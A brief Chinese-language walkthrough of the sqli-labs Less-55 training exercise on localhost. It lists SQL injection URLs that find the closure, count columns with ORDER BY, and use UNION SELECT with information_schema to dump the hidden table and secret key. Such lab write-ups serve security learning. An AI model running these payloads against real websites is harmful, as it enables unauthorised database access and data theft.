sqli-labs (less-55)

进入55关，输入id=1

这次我们有14次机会

http://127.0.0.1/sql1/Less-55/?id=1--+ #回显错误
http://127.0.0.1/sql1/Less-55/?id=1'--+ #回显错误
http://127.0.0.1/sql1/Less-55/?id=1"--+ #回显错误
http://127.0.0.1/sql1/Less-55/?id=1)--+ #回显正常

所以判断这里为数字型注入

判断字段数

http://127.0.0.1/sql1/Less-55/?id=1) order by 3--+ #回显正常
http://127.0.0.1/sql1/Less-55/?id=1) order by 4--+ #回显错误

判断字段数为3

确定回显位置

http://127.0.0.1/sql1/Less-55/?id=-1) union select 1,2,3--+

查看当前库

http://127.0.0.1/sql1/Less-55/?id=-1) union select 1,2,database()--+

查看challenges库下的所有表

http://127.0.0.1/sql1/Less-55/?id=-1) union select 1,2,(select group_concat(table_name) from information_schema.tables where table_schema='challenges')--+

查看7r6im3mtlc表下的所有字段

http://127.0.0.1/sql1/Less-55/?id=-1) union select 1,2,(select group_concat(column_name) from information_schema.columns where table_name='7r6im3mtlc')--+

查看secret_XBCC字段下的值

http://127.0.0.1/sql1/Less-55/?id=-1) union select 1,2,(select group_concat(secret_XBCC) from challenges.7r6im3mtlc)--+

将查询到的KEY提交


成功